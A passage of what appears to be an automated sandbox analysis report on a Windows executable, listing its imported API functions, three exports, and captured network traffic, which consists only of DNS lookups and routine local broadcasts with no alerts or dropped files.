0x4e12c4 IsDebuggerPresent
0x4e12c8 GetFullPathNameW
0x4e12cc VirtualFree
0x4e12d0 HeapAlloc
0x4e12d4 GetStartupInfoW
0x4e12d8 ExitProcess
0x4e12dc GetFileAttributesW
0x4e12e4 GetCPInfoExW
0x4e12e8 GetThreadPriority
0x4e12ec GetCurrentProcess
0x4e12f0 SetThreadPriority
0x4e12f4 VirtualAlloc
0x4e12f8 RtlUnwind
0x4e12fc GetCPInfo
0x4e1300 GetCommandLineW
0x4e1304 GetSystemInfo
0x4e1308 ResumeThread
0x4e130c GetProcAddress
0x4e1314 EnumSystemLocalesW
0x4e1318 GetStdHandle
0x4e131c GetVersionExW
0x4e1320 VerifyVersionInfoW
0x4e1324 GetModuleHandleW
0x4e1328 FreeLibrary
0x4e132c HeapCreate
0x4e1330 HeapDestroy
0x4e1334 ReadFile
0x4e1338 GetDiskFreeSpaceW
0x4e133c VerSetConditionMask
0x4e1344 FindFirstFileW
0x4e1348 CreateProcessW
0x4e134c HeapSize
0x4e1350 GetModuleFileNameW
0x4e1354 GetLastError
0x4e1358 lstrlenW
0x4e135c SetEndOfFile
0x4e1364 CompareStringW
0x4e1368 CreateThread
0x4e136c HeapFree
0x4e1370 WideCharToMultiByte
0x4e1374 MultiByteToWideChar
0x4e1378 FindClose
0x4e137c LoadLibraryA
0x4e1380 ResetEvent
0x4e1384 SetEvent
0x4e1388 CreateFileW
0x4e138c GetLocaleInfoW
0x4e1390 GetVersion
0x4e1394 DeleteFileW
0x4e1398 MoveFileW
0x4e139c RaiseException
0x4e13a0 FormatMessageW
0x4e13a4 SwitchToThread
0x4e13a8 GetExitCodeThread
0x4e13ac GetLocalTime
0x4e13b0 GetConsoleWindow
0x4e13b4 WaitForSingleObject
0x4e13b8 GetCurrentThread
0x4e13bc WriteFile
0x4e13c0 ExitThread
0x4e13c4 CreatePipe
0x4e13cc GetDateFormatW
0x4e13d0 TlsGetValue
0x4e13d4 GetComputerNameW
0x4e13d8 IsValidLocale
0x4e13dc TlsSetValue
0x4e13e0 CreateDirectoryW
0x4e13e4 LoadLibraryExW
0x4e13ec EnumCalendarInfoW
0x4e13f0 LocalAlloc
0x4e13f4 GetCurrentThreadId
0x4e13fc VirtualQuery
0x4e1400 CreateEventW
0x4e1404 VirtualQueryEx
0x4e1408 GetThreadLocale
0x4e140c Sleep
0x4e1410 SetThreadLocale
Library shell32.dll:
0x4e1418 ShellExecuteW
Library version.dll:
0x4e1424 VerQueryValueW
0x4e1428 GetFileVersionInfoW
Library user32.dll:
0x4e1430 CharUpperBuffW
0x4e1434 CharNextW
0x4e143c ShowWindow
0x4e1440 CharLowerBuffW
0x4e1444 LoadStringW
0x4e1448 CharUpperW
0x4e144c PeekMessageW
0x4e1450 GetSystemMetrics
0x4e1454 MessageBoxW
Library oleaut32.dll:
0x4e145c SysAllocStringLen
0x4e1460 SafeArrayPtrOfIndex
0x4e1464 VariantCopy
0x4e1468 SafeArrayGetLBound
0x4e146c SafeArrayGetUBound
0x4e1470 VariantInit
0x4e1474 VariantClear
0x4e1478 SysFreeString
0x4e147c SysReAllocStringLen
0x4e1480 VariantChangeType
0x4e1484 SafeArrayCreate
Library netapi32.dll:
0x4e148c NetWkstaGetInfo
0x4e1490 NetApiBufferFree
Library advapi32.dll:
0x4e1498 RegQueryValueExW
0x4e149c RegCloseKey
0x4e14a0 RegOpenKeyExW

Exports

Ordinal Address Name
3 0x45c70c TMethodImplementationIntercept
2 0x41010c __dbk_fcall_wrapper
1 0x4de63c dbkFCallWrapperAddr

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50003 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.